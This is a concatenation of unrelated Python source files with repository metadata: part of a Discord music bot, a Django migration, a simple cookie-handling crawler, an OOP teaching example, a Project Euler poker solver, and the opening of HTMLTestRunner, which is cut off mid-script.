    await ctx.send("Повтор: "+str(bot.is_looped))


@bot.command(pass_context=True)
async def cur(ctx):
    """Report the currently playing track."""
    await ctx.send("Сейчас играет: " + str(bot.curr_track))
@bot.command(pass_context=True)
async def clear(ctx):
    """Drain the async playback queue and its display mirror."""
    await bot.wait_until_ready()
    while have_next():
        if queue_async.qsize() > 0:
            bot.queue.pop(0)
            bot.queue_size -= 1
            await queue_async.get()
    # Reset the display mirror regardless.
    bot.queue = []
    bot.queue_size = 0
    await ctx.send("Произошло глубинное очищение")
@bot.command(pass_context=True)
async def join(ctx):
    """Connect the bot to the command author's voice channel."""
    channel = ctx.author.voice.channel
    bot.vc = await channel.connect()
    await ctx.send("RACHKO-BOT в этом чатике")


@bot.command(pass_context=True)
async def disconnect(ctx):
    """Leave the current voice channel."""
    await bot.vc.disconnect()
    await ctx.send("Понял. Ушел...")


@bot.command(pass_context=True)
async def play_test(ctx):
    """Play a local testing.mp3 (hard-coded Windows ffmpeg path)."""
    bot.vc.play(discord.FFmpegPCMAudio(executable="C:/Users/User/PycharmProjects/RACHKO_BOT/ffmpeg/bin/ffmpeg.exe",
                                       source="testing.mp3"))
    await ctx.send("Playing")
@bot.command(pass_context=True)
async def queue(ctx):
    """Print the current (display) playlist to the text channel."""
    if bot.queue_size == 0:
        await ctx.send("Ало!!! где треки?")
        return
    await ctx.send("======================== Наш текущий плейлист ========================")
    for i, item in enumerate(bot.queue):
        if i == 0:
            # Mark the head of the queue as the current/next track.
            await ctx.send(">>" + " " + str(item))
        else:
            await ctx.send(str(i) + " - " + str(item))
    await ctx.send("======================================================================")
@bot.command(pass_context=True)
async def next(ctx):
    """Skip to the next queued track (or replay when repeat is on).

    NOTE(review): shadows the builtin ``next`` at module level — kept,
    since the command name is part of the bot's interface.
    """
    bot.last_ctx = ctx
    await stop(ctx)
    if bot.is_looped:
        await play(ctx=ctx, url=bot.curr_track)
        await ctx.send("Повтор")
    else:
        if queue_async.qsize() > 0:
            print("get next track (next)")
            bot.queue.pop(0)
            bot.queue_size -= 1
            url = await queue_async.get()
            print("start playing " + str(url))
            await play(ctx=ctx, url=url)
            await ctx.send("Следующий трек")
        else:
            print("no more tracks")
            await ctx.send("Ало!!! где треки?")
@bot.command(pass_context=True)
async def play(ctx, *, url):
    """Play *url* now, or enqueue it when something is already playing.

    Every requested URL is appended to music_base.txt so !music can later
    rebuild playlists from history.
    """
    with open('music_base.txt', 'a') as f:
        f.write(str(url) + '\n')
    print(str(url) + '\n')
    bot.last_ctx = ctx
    add_task = False
    if bot.vc == "0":
        # Not connected yet: join the author's channel and register the
        # first track, then attach the watchdog cog below.
        print("бот не был подключен, подключаюсь")
        await join(ctx)
        bot.queue_size += 1
        bot.queue.append(url)
        print("+ in q " + str(url))
        add_task = True
    if bot.vc.is_playing():
        await ctx.send("Добавляю в очередь ")
        print("Добавляю в очередь " + str(url))
        bot.queue.append(url)
        bot.queue_size += 1
        await queue_async.put(url)
    else:
        print("Воспроизведение " + str(url))
        player = await YTDLSource.from_url(url, loop=bot.loop)
        bot.curr_track = url
        bot.vc.play(player, after=lambda e: print('Player error: %s' % e) if e else None)
        print("Поток пошел")
    if add_task:
        await setup()
@bot.command(pass_context=True)
async def test(ctx):
    """Debug command: manually attach the watchdog cog."""
    bot.last_ctx = ctx
    print("start")
    bot.add_cog(MyCog(bot))
    print("end")


@bot.command(pass_context=True)
async def pause(ctx):
    """Pause playback."""
    bot.last_ctx = ctx
    bot.vc.pause()
    await ctx.send("Ожидаю")


@bot.command(pass_context=True)
async def stop(ctx):
    """Stop playback entirely."""
    bot.last_ctx = ctx
    bot.vc.stop()
    print("stop")


@bot.command(pass_context=True)
async def resume(ctx):
    """Resume paused playback."""
    bot.last_ctx = ctx
    bot.vc.resume()
    await ctx.send("Продолжаем")
def count_lines(filename, chunk_size=1<<13):
    """Count newline characters in *filename*.

    Reads the file in fixed-size chunks so arbitrarily large files are
    handled without loading them into memory at once.
    """
    total = 0
    with open(filename) as handle:
        while True:
            chunk = handle.read(chunk_size)
            if not chunk:
                break
            total += chunk.count('\n')
    return total
@bot.command(pass_context=True)
async def format_music_base(ctx):
    """Remove duplicate lines from music_base.txt, preserving order.

    Writes the deduplicated content to music_base_tmp.txt first, then
    copies it back over music_base.txt only if duplicates were found.
    Reports the before/after line counts to the channel.

    Fixes vs. original: files are always closed (the no-duplicates
    branch previously leaked both handles), the builtin name ``input``
    is no longer shadowed, and membership testing uses a set instead of
    an O(n) list scan.
    """
    nlines = count_lines("music_base.txt")
    dnlines = nlines
    seen = set()
    with open('music_base.txt', 'r') as src, open('music_base_tmp.txt', 'w') as tmp:
        for line in src:
            if line not in seen:
                seen.add(line)
                tmp.write(line)
            else:
                # Duplicate: drop it and shrink the post-dedup count.
                dnlines -= 1
    if nlines == dnlines:
        await ctx.send("В базе нет одинаковых треков")
    else:
        # Copy the deduplicated temp file back over the main base file.
        with open('music_base_tmp.txt', 'r') as tmp, open('music_base.txt', 'w') as dst:
            for line in tmp:
                dst.write(line)
        print("format music base", nlines, dnlines)
        await ctx.send("music_base from " + str(nlines) + " to " + str(dnlines))
bot.run(TOKEN) | [
"kravtandr@gmail.com"
] | kravtandr@gmail.com |
08a37d90b3f059b2aa1dbe702641ec21a7948d61 | 2347114af7c59bf1e9fb08d94b95b8ba7332b857 | /tagz/cart/migrations/0008_remove_cart_tax_total.py | 3ee06e9840feb308f73e4a65247b0dc82b7e7ec7 | [] | no_license | NjamiGeorge/taggz | ae654cc8478b7b63deec040e9adc33a2afc6199c | c1878d2bd41971556818d4cd9f35da71d935e185 | refs/heads/master | 2022-11-25T14:45:11.955945 | 2017-10-31T03:01:31 | 2017-10-31T03:01:31 | 108,722,476 | 0 | 1 | null | 2022-11-24T05:31:27 | 2017-10-29T09:53:27 | PHP | UTF-8 | Python | false | false | 389 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2017-07-17 06:00
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: drop the ``tax_total`` field from ``Cart``."""
    # Must run after the previous cart migration.
    dependencies = [
        ('cart', '0007_auto_20170715_0050'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='cart',
            name='tax_total',
        ),
    ]
| [
"njamygeorge9@gmail.com"
] | njamygeorge9@gmail.com |
97d77bcca3c8bc2b45e3bfc2dd41990203cc308e | 765b2891670fbf0c72c7bdc71a0aa9957ed6882d | /includes/Crawler.py | 4eb408d2874f5dc1f88c671012ffa5f954f6f12c | [
"Unlicense"
] | permissive | koteq/hlstats_inviter | 586ad639cb90deb901dfb6c13990cd6f9d5c470c | c00253b285c8ab2810b830d780e011c0ed03cf9c | refs/heads/master | 2021-01-11T15:27:26.489588 | 2017-03-21T20:46:16 | 2017-03-21T20:46:16 | 80,348,608 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,092 | py | import logging
import urllib
import urllib2
import cookielib
logger = logging.getLogger()
class Crawler(object):
    """
    Crawls the web while keeping cookies in a temporary jar.
    """
    # NOTE: uses Python 2 stdlib modules (urllib2, cookielib).
    user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
    def __init__(self):
        # In-memory cookie jar shared by all requests from this crawler.
        self.cookie_jar = cookielib.LWPCookieJar()
        cookie_handler = urllib2.HTTPCookieProcessor(self.cookie_jar)
        self.opener = urllib2.build_opener(cookie_handler)
    def request(self, url, data=None, headers=None):
        """GET *url*, or POST when *data* (a dict) is given.

        Returns the urllib2 response object.  Note: a caller-supplied
        *headers* dict is mutated in place (User-Agent/Content-type added).
        """
        headers = headers or {}
        headers['User-Agent'] = self.user_agent
        if data is not None:
            # POST: form-encode the payload.
            data = urllib.urlencode(data)
            headers['Content-type'] = 'application/x-www-form-urlencoded'
        self.opener.addheaders = headers.items()
        logger.debug('Requesting %s', url)
        response = self.opener.open(url, data)
        return response
    def ajax(self, url, data=None, headers=None):
        """Like request(), but marked as an XMLHttpRequest call."""
        headers = headers or {}
        headers['X-Requested-With'] = 'XMLHttpRequest'
        return self.request(url, data, headers)
| [
"rereflex@gmail.com"
] | rereflex@gmail.com |
99b2cbedd4464c5e7d62fdf126c0a95f084e93d5 | cb703e45cf56ec816eb9203f171c0636aff0b99c | /Dzien01/08-oop-props-static.py | f4e5aa6ff530e529ea2d973776f3e0a6924fe599 | [] | no_license | marianwitkowskialx/Enzode | dc49f09f086e4ca128cd189852331d3c9b0e14fb | 67d8fd71838d53962b4e58f73b92cb3b71478663 | refs/heads/main | 2023-06-04T20:58:17.486273 | 2021-06-24T16:37:53 | 2021-06-24T16:37:53 | 366,424,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 908 | py | from datetime import date
# OOP - metody statyczne, classmethods, properties
class Person:
    """Demo class: static methods, alternate constructors and properties."""

    def __init__(self, name, age):
        self.name = name
        self.age = age

    def __str__(self):
        return f"name={self.name}, age={self.age}"

    @staticmethod
    def is_adult(age):
        """True once *age* reaches the age of majority (18)."""
        return not age < 18

    @classmethod
    def create_from_year(cls, name, yob):
        """Alternate constructor deriving the age from a year of birth."""
        return cls(name, date.today().year - yob)

    def get_age(self):
        return self.age

    def set_age(self, age):
        self.age = age

    def del_age(self):
        del self.age

    # Managed attribute built from the accessor trio above.
    AGE = property(fget=get_age, fset=set_age, fdel=del_age)
# Demo: exercise the constructor, staticmethod, classmethod and property.
person1 = Person("Jan", 33)
print(person1)
print(Person.is_adult(18))
person2 = Person.create_from_year("Bob", 1980)
print(person2)
print(person2.AGE)
person2.AGE = 44
print(person2.AGE)
del(person2.AGE)
# After deleting via the property, the instance no longer has 'age'.
print(dir(person2))
| [
"noreply@github.com"
] | marianwitkowskialx.noreply@github.com |
9172f47544a3ec96a3b22276472d050776365b40 | 8df5df20ac10a8dc81f7ac6e21e835553a8f5e2d | /src/sleekapps/threads/signals/thread/thread.py | 62045b0ba77e61bb8a378d1da88a8b31a5019dbe | [] | no_license | adepeter/sleekforum | 7be71907d26623c43cd78a6da77a2398c1c25e26 | 35385e648974cdf009732af4c50b69a1825f7fda | refs/heads/master | 2022-09-18T02:45:42.522128 | 2021-10-23T06:41:44 | 2021-10-23T06:41:44 | 208,669,487 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,075 | py | from django.core.cache import cache
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from .models import Thread, ThreadView
# from ..miscs.models.activity import Action
# from ..miscs.signals.activity import activity_updater
# #
# # @receiver(post_save, sender=Action)
# # def like_and_dislike_handler(sender, instance, created, **kwargs):
# # from django.contrib.contenttypes.models import ContentType
# # ct = ContentType.objects.get_for_model(instance).get_object_for_this_type()
# # if created:
# # get_ct_for_obj_of_instance = instance.content_object
# # if instance.action_value == Action.LIKE:
# # get_ct_for_obj_of_instance.likes = ct
# # print('Ading likes counter')
# # else:
# # print('Adding dislike counter')
# # get_ct_for_obj_of_instance.dislikes = ct
# # get_ct_for_obj_of_instance.save()
# #
# #
# # # @receiver(activity_updater)
# # # def hal(sender, **kwargs):
# # # print('Sender is', sender, kwargs.get('obj'))
| [
"adepeter26@gmail.com"
] | adepeter26@gmail.com |
04ffcc70351df93f444c5dd0ab2d2ac5febc079c | 4df72b739a9ffb720091b40fda1571781f1225ef | /Python/p054.py | 5e1b3d10cd61cc7ac9cc6ddf425d935f8b7f6f81 | [] | no_license | kentfrazier/euler | e48f49170ecc5def51ec6dcfc73b01c51ba5ec7a | 21e82060128026287a84f6d455f247df6910a099 | refs/heads/master | 2021-01-10T08:19:55.219330 | 2013-03-20T05:15:22 | 2013-03-20T05:15:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,311 | py | # In the card game poker, a hand consists of five cards and are ranked
# , from lowest to highest, in the following way:
#
# * High Card: Highest value card.
# * One Pair: Two cards of the same value.
# * Two Pairs: Two different pairs.
# * Three of a Kind: Three cards of the same value.
# * Straight: All cards are consecutive values.
# * Flush: All cards of the same suit.
# * Full House: Three of a kind and a pair.
# * Four of a Kind: Four cards of the same value.
# * Straight Flush: All cards are consecutive values of same suit.
# * Royal Flush: Ten, Jack, Queen, King, Ace, in same suit.
#
# The cards are valued in the order:
# 2, 3, 4, 5, 6, 7, 8, 9, 10, Jack, Queen, King, Ace.
#
# If two players have the same ranked hands then the rank made up of
# the highest value wins; for example, a pair of eights beats a pair
# of fives (see example 1 below). But if two ranks tie, for example,
# both players have a pair of queens, then highest cards in each hand
# are compared (see example 4 below); if the highest cards tie then
# the next highest cards are compared, and so on.
#
# Consider the following five hands dealt to two players:
#
# The file, poker.txt, contains one-thousand random hands dealt to
# two players. Each line of the file contains ten cards (separated by
# a single space): the first five are Player 1's cards and the last
# five are Player 2's cards. You can assume that all hands are valid
# (no invalid characters or repeated cards), each player's hand is in
# no specific order, and in each hand there is a clear winner.
#
# How many hands does Player 1 win?
from copy import copy
HEARTS = 0
SPADES = 1
CLUBS = 2
DIAMONDS = 3
TWO = 0
THREE = 1
FOUR = 2
FIVE = 3
SIX = 4
SEVEN = 5
EIGHT = 6
NINE = 7
TEN = 8
JACK = 9
QUEEN = 10
KING = 11
ACE = 12
HIGH_CARD = 0
PAIR = 1
TWO_PAIR = 2
THREE_OF_A_KIND = 3
STRAIGHT = 4
FLUSH = 5
FULL_HOUSE = 6
FOUR_OF_A_KIND = 7
STRAIGHT_FLUSH = 8
suits = {
'H': HEARTS,
'S': SPADES,
'C': CLUBS,
'D': DIAMONDS,
}
ranks = {
'2': TWO,
'3': THREE,
'4': FOUR,
'5': FIVE,
'6': SIX,
'7': SEVEN,
'8': EIGHT,
'9': NINE,
'T': TEN,
'J': JACK,
'Q': QUEEN,
'K': KING,
'A': ACE,
}
class Card(object):
    """One playing card, parsed from a two-character code such as 'AH'."""

    def __init__(self, card_string):
        # First character encodes the rank, second the suit.
        self.rank = ranks[card_string[0]]
        self.suit = suits[card_string[1]]
        self.string = card_string

    def __cmp__(self, other_card):
        """Order cards by rank only; suit never breaks a tie (Python 2)."""
        if self.rank == other_card.rank:
            return 0
        return -1 if self.rank < other_card.rank else 1

    def __str__(self):
        return self.string
class Hand(object):
    """A five-card poker hand, classified on construction.

    After __init__, ``hand_value`` holds one of the rank constants
    (HIGH_CARD .. STRAIGHT_FLUSH), ``active_cards`` the cards forming the
    ranked combination, ``remaining_cards`` the kickers, and
    ``major_rank``/``minor_rank`` the primary/secondary rank for ties.
    """
    def __init__(self, cards):
        # Cards are kept sorted high-to-low (Card compares by rank).
        self.cards = sorted([Card(card) for card in cards], reverse=True)
        self.hand_value = self.evaluate()
    def evaluate(self):
        """Classify the hand and populate the tie-break attributes."""
        # Flush: all five cards share one suit.
        if len(set(card.suit for card in self.cards)) == 1:
            flush = True
        else:
            flush = False
        # Straight: either exactly {A,2,3,4,5} (the wheel) or five
        # consecutive descending ranks.
        # NOTE(review): for the wheel, cards stay sorted ace-high, so a
        # wheel may compare as the *highest* straight -- verify intended.
        if ( len(set( card.rank for card in self.cards ) ^ set([ACE, TWO, THREE, FOUR, FIVE])) == 0
            or all( (self.cards[i].rank == (self.cards[i+1].rank + 1)) for i in range(len(self.cards)-1) ) ):
            straight = True
        else:
            straight = False
        if straight or flush:
            # Whole hand participates; no kickers.
            self.active_cards = self.cards
            self.remaining_cards = []
            self.major_rank = None
            self.minor_rank = None
            if straight and flush:
                return STRAIGHT_FLUSH
            if flush:
                return FLUSH
            if straight:
                return STRAIGHT
        # Count how many cards of each rank the hand holds.
        ranks = [ card.rank for card in self.cards ]
        distribution = dict((rank, ranks.count(rank)) for rank in set(ranks))
        four_sets = [ key for key in distribution.keys() if distribution.get(key) == 4 ]
        three_sets = [ key for key in distribution.keys() if distribution.get(key) == 3 ]
        pairs = [ key for key in distribution.keys() if distribution.get(key) == 2 ]
        if len(four_sets) == 1:
            self.major_rank = four_sets[0]
            self.minor_rank = None
            self.active_cards = [ card for card in self.cards if card.rank in four_sets ]
            self.remaining_cards = [ card for card in self.cards if card.rank not in four_sets ]
            return FOUR_OF_A_KIND
        if len(three_sets) == 1:
            self.major_rank = three_sets[0]
            if len(pairs) == 1:
                # Trips plus a pair: full house, no kickers.
                self.minor_rank = pairs[0]
                self.active_cards = self.cards
                self.remaining_cards = []
                return FULL_HOUSE
            self.minor_rank = None
            self.active_cards = [ card for card in self.cards if card.rank in three_sets ]
            self.remaining_cards = [ card for card in self.cards if card.rank not in three_sets ]
            return THREE_OF_A_KIND
        if len(pairs) == 2:
            # Higher pair is the major rank, lower pair the minor.
            self.major_rank = max(pairs)
            self.minor_rank = min(pairs)
            self.active_cards = [ card for card in self.cards if card.rank in pairs ]
            self.remaining_cards = [ card for card in self.cards if card.rank not in pairs]
            return TWO_PAIR
        if len(pairs) == 1:
            self.major_rank = pairs[0]
            self.minor_rank = None
            self.active_cards = [ card for card in self.cards if card.rank in pairs ]
            self.remaining_cards = [ card for card in self.cards if card.rank not in pairs]
            return PAIR
        # No combination: the single highest card plays.
        self.active_cards = [self.cards[0]]
        self.remaining_cards = self.cards[1:]
        self.major_rank = self.active_cards[0].rank
        self.minor_rank = None
        return HIGH_CARD
    def __cmp__(self, other_hand):
        """Python 2 three-way compare: hand class first, then major/minor
        ranks, then the combination cards, then the kickers."""
        if self.hand_value > other_hand.hand_value:
            return 1
        if self.hand_value < other_hand.hand_value:
            return -1
        if self.major_rank > other_hand.major_rank:
            return 1
        if self.major_rank < other_hand.major_rank:
            return -1
        # NOTE: minor_rank may be None; Py2 orders None below any int.
        if self.minor_rank > other_hand.minor_rank:
            return 1
        if self.minor_rank < other_hand.minor_rank:
            return -1
        if self.active_cards > other_hand.active_cards:
            return 1
        if self.active_cards < other_hand.active_cards:
            return -1
        if self.remaining_cards > other_hand.remaining_cards:
            return 1
        if self.remaining_cards < other_hand.remaining_cards:
            return -1
        return 0
    def __str__(self):
        return ', '.join([str(card) for card in self.active_cards]) + ' (' + ', '.join([str(card) for card in self.remaining_cards]) + ') - ' + str(self.hand_value)
if __name__ == "__main__":
    # Project Euler 54: count Player 1 wins over the 1000 dealt hands.
    player_1_wins = 0
    player_2_wins = 0
    ties = 0
    with open('poker.txt','r') as file:
        for line in file.readlines():
            # Each line: ten space-separated cards, first five = player 1.
            cards = line.strip().split()
            player_1_hand = Hand(cards[:5])
            player_2_hand = Hand(cards[5:])
            # Comparison uses Hand.__cmp__ (Python 2 semantics).
            if player_1_hand > player_2_hand:
                player_1_wins += 1
            elif player_1_hand < player_2_hand:
                player_2_wins += 1
            else:
                ties += 1
    print player_1_wins
| [
"kentfrazier@gmail.com"
] | kentfrazier@gmail.com |
95f948dd12b0ea9f0e2a23ae2e78206b7df829ab | ac1dc07755a7644bd2af77de53ef26c7956f1344 | /Public/HTMLTestRunner_Rewrite.py | aa14b97aca869e2945ed32dd40eb333a3488e454 | [] | no_license | yu874721995/onesPro | 5483324cc99bcafa0847bb189cac8d24a956f4c9 | 384e83b266e61baf51c63a9b85074cd63d713bd4 | refs/heads/master | 2022-12-21T03:19:04.855909 | 2021-11-24T12:15:28 | 2021-11-24T12:15:28 | 204,904,033 | 1 | 0 | null | 2022-07-29T23:27:38 | 2019-08-28T10:15:35 | HTML | UTF-8 | Python | false | false | 42,019 | py | """
A TestRunner for use with the Python unit testing framework. It
generates a HTML report to show the result at a glance.
The simplest way to use this is to invoke its main method. E.g.
import unittest
import HTMLTestRunner
... define your tests ...
if __name__ == '__main__':
HTMLTestRunner.main()
For more customization options, instantiate an HTMLTestRunner object.
HTMLTestRunner is a counterpart to unittest's TextTestRunner. E.g.
# output to a file
fp = file('my_report.html', 'wb')
runner = HTMLTestRunner.HTMLTestRunner(
stream=fp,
title='My unit test',
description='This demonstrates the report output by HTMLTestRunner.'
)
# Use an external stylesheet.
# See the Template_mixin class for more customizable options
runner.STYLESHEET_TMPL = '<link rel="stylesheet" href="my_stylesheet.css" type="text/css">'
# run the test
runner.run(my_test_suite)
------------------------------------------------------------------------
Copyright (c) 2004-2007, Wai Yip Tung
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name Wai Yip Tung nor the names of its contributors may be
used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
# URL: http://tungwaiyip.info/software/HTMLTestRunner.html
__author__ = "Wai Yip Tung"
__version__ = "0.8.2"
"""
Change History
Version 0.8.2
* Show output inline instead of popup window (Viorel Lupu).
Version in 0.8.1
* Validated XHTML (Wolfgang Borgert).
* Added description of test classes and test cases.
Version in 0.8.0
* Define Template_mixin class for customization.
* Workaround a IE 6 bug that it does not treat <script> block as CDATA.
Version in 0.7.1
* Back port to Python 2.3 (Frank Horowitz).
* Fix missing scroll bars in detail log (Podi).
"""
# TODO: color stderr
# TODO: simplify javascript using more than 1 class in the class attribute?
import datetime
import io
import sys
import time
import unittest
from xml.sax import saxutils
# ------------------------------------------------------------------------
# The redirectors below are used to capture output during testing. Output
# sent to sys.stdout and sys.stderr are automatically captured. However
# in some cases sys.stdout is already cached before HTMLTestRunner is
# invoked (e.g. calling logging.basicConfig). In order to capture those
# output, use the redirectors for the cached stream.
#
# e.g.
# >>> logging.basicConfig(stream=HTMLTestRunner.stdout_redirector)
# >>>
class OutputRedirector(object):
    """Forward write/flush calls to a wrapped file-like object.

    Instances stand in for sys.stdout / sys.stderr so that test output
    can be captured by swapping the ``fp`` attribute per test.
    """

    def __init__(self, fp):
        # Current target stream; reassigned by the test-result collector.
        self.fp = fp

    def write(self, text):
        self.fp.write(text)

    def writelines(self, chunks):
        self.fp.writelines(chunks)

    def flush(self):
        self.fp.flush()
# Module-level singletons: swap their .fp to capture stdout/stderr.
stdout_redirector = OutputRedirector(sys.stdout)
stderr_redirector = OutputRedirector(sys.stderr)
# ----------------------------------------------------------------------
# Template
class Template_mixin(object):
"""
Define a HTML template for report customerization and generation.
Overall structure of an HTML report
HTML
+------------------------+
|<html> |
| <head> |
| |
| STYLESHEET |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </head> |
| |
| <body> |
| |
| HEADING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| REPORT |
| +----------------+ |
| | | |
| +----------------+ |
| |
| ENDING |
| +----------------+ |
| | | |
| +----------------+ |
| |
| </body> |
|</html> |
+------------------------+
"""
STATUS = {
0: 'pass',
1: 'fail',
2: 'error',
}
DEFAULT_TITLE = 'Unit Test Report'
DEFAULT_DESCRIPTION = ''
# ------------------------------------------------------------------------
# HTML Template
HTML_TMPL = r"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<meta name="generator" content="%(generator)s"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
%(stylesheet)s
</head>
<body style="background-color:#C0C0C0">
<script language="javascript" type="text/javascript"><!--
output_list = Array();
/* level - 0:Summary; 1:Pass; 2:Fail; 3:Error; 4:All */
function showCase(level) {
trs = document.getElementsByTagName("tr");
for (var i = 0; i < trs.length; i++) {
tr = trs[i];
id = tr.id;
if (id.substr(0,2) == 'Ft') {
if (level == 2) {
tr.className = '';
}
else if(level == 4) {
tr.className = '';
}
else if(level == 5) {
tr.className = '';
}
else{
tr.className = 'hiddenRow';
}
}
if (id.substr(0,2) == 'Pt') {
if (level == 1) {
tr.className = '';
}
else if(level == 4 ) {
tr.className = '';
}
else{
tr.className = 'hiddenRow';
}
}
if (id.substr(0,2) == 'Et') {
if (level == 3) {
tr.className = '';
}
else if(level == 4 ) {
tr.className = '';
}
else if(level == 5 ) {
tr.className = '';
}
else{
tr.className = 'hiddenRow';
}
}
}
}
function showClassDetail(cid, count) {
var id_list = Array(count);
var toHide = 1;
for (var i = 0; i < count; i++) {
tid0 = 't' + cid.substr(1) + '.' + (i+1);
tid = 'F' + tid0;
tr = document.getElementById(tid);
if (!tr) {
tid = 'P' + tid0;
tr = document.getElementById(tid);
if(!tr){
tid = 'E' + tid0;
tr = document.getElementById(tid);
}
}
id_list[i] = tid;
if (tr.className) {
toHide = 0;
}
}
for (var i = 0; i < count; i++) {
tid = id_list[i];
if (toHide) {
document.getElementById('div_'+tid).style.display = 'none'
document.getElementById(tid).className = 'hiddenRow';
}
else {
document.getElementById(tid).className = '';
}
}
}
function showTestDetail(div_id){
var details_div = document.getElementById(div_id)
var displayState = details_div.style.display
// alert(displayState)
if (displayState != 'block' ) {
displayState = 'block'
details_div.style.display = 'block'
}
else {
details_div.style.display = 'none'
}
}
function html_escape(s) {
s = s.replace(/&/g,'&');
s = s.replace(/</g,'<');
s = s.replace(/>/g,'>');
return s;
}
/* obsoleted by detail in <div>
function showOutput(id, name) {
var w = window.open("", //url
name,
"resizable,scrollbars,status,width=800,height=450");
d = w.document;
d.write("<pre>");
d.write(html_escape(output_list[id]));
d.write("\n");
d.write("<a href='javascript:window.close()'>close</a>\n");
d.write("</pre>\n");
d.close();
}
*/
--></script>
%(heading)s
%(report)s
%(ending)s
%(chart)s
</body>
</html>
<script type="text/javascript">
function drawCircle(pass, fail, error){
var color = ["#6c6","#c60","#c00"];
var data = [pass,fail,error];
var canvas = document.getElementById("circle");
var ctx = canvas.getContext("2d");
var startPoint=0;
for(var i=0;i<data.length;i++){
ctx.fillStyle = color[i];
ctx.beginPath();
ctx.moveTo(112,84);
ctx.arc(112,84,84,startPoint,startPoint+Math.PI*2*(data[i]/(data[0]+data[1]+data[2])),false);
ctx.fill();
startPoint += Math.PI*2*(data[i]/(data[0]+data[1]+data[2]));
}
}
function FillRect(cxt, x1, y1, width, height, color) {
cxt.fillStyle = color;
cxt.fillRect(x1, y1, width, height);
}
function drawBar(pass, fail, error){
var color = ["#6c6","#c60","#c00"];
var data = [pass,fail,error];
var count = pass + fail + error;
var h =[10+(1 - pass/count)*148,10+(1 - fail/count)*148,10+(1 - error/count)*148];
var x = [30,90,150];
var y = [70,130,190];
var canvas = document.getElementById("bar");
var ctx = canvas.getContext("2d");
DrawString(ctx, 'Count(c)', '', '', '', '', 15, 10)
DrawLine(ctx,5,15,10,10,'black');
DrawLine(ctx,15,15,10,10,'black');
DrawLine(ctx,10,10,10,158,'black');
DrawLine(ctx,10,158,215,158,'black');
DrawLine(ctx,210,153,215,158,'black');
DrawLine(ctx,210,163,215,158,'black');
DrawString(ctx, 'Type(c)', '', '', '', '', 180, 160)
for(var i=0;i<3;i++) {
DrawLine(ctx,x[i],h[i],x[i],158,color[i]);
DrawLine(ctx,x[i],h[i],y[i],h[i],color[i]);
DrawLine(ctx,y[i],h[i],y[i],158,color[i]);
DrawLine(ctx,(y[i]+x[i])/2,153,(y[i]+x[i])/2,158,color[i]);
DrawString(ctx, data[i], '', color[i], '', '', (y[i]+x[i])/2, h[i]-15);
FillRect(ctx, x[i], h[i], 40, 158-h[i], color[i]);
}
}
function DrawP(ctx, P) {
with (ctx) {
moveTo(P[0],P[1]);
lineTo(P[0]+1,P[1]+1);
}
}
function DrawLine(cxt, x1, y1, x2, y2, color) {
cxt.strokeStyle = color;
cxt.beginPath();
cxt.moveTo(x1, y1);
cxt.lineTo(x2, y2);
cxt.stroke();
}
function DrawString(cxt, text, font, color, align, v_align, x, y) {
if (font == "") {
cxt.font = "10px";
}
else {
cxt.font = font;
}
if (color == "") {
cxt.fillStyle = "#000000";
}
else {
cxt.fillStyle = color;
}
if (align == "") {
cxt.textAlign = "left";
}
else {
cxt.textAlign = align;
}
if (v_align == "") {
cxt.textBaseline = "top";
}
else {
cxt.textBaseline = v_align;
}
cxt.fillText(text, x, y);
}
function drawline(pass, fail, error){
var color = ["#6c6","#c60","#c00"];
var data = [pass,fail,error];
var count = pass + fail + error;
var x = [30,90,150];
var y = [70,130,190];
var h =[10+(1 - pass/count)*148,10+(1 - fail/count)*148,10+(1 - error/count)*148];
var canvas = document.getElementById("line");
var ctx = canvas.getContext("2d");
DrawString(ctx, 'Count(c)', '', '', '', '', 15, 10)
DrawLine(ctx,5,15,10,10,'black');
DrawLine(ctx,15,15,10,10,'black');
DrawLine(ctx,10,10,10,158,'black');
DrawLine(ctx,10,158,215,158,'black');
DrawLine(ctx,210,153,215,158,'black');
DrawLine(ctx,210,163,215,158,'black');
DrawString(ctx, 'Type(c)', '', '', '', '', 180, 160)
for(var i=0;i<3;i++) {
p = Array((y[i]+x[i])/2,h[i]);
DrawP(ctx,p);
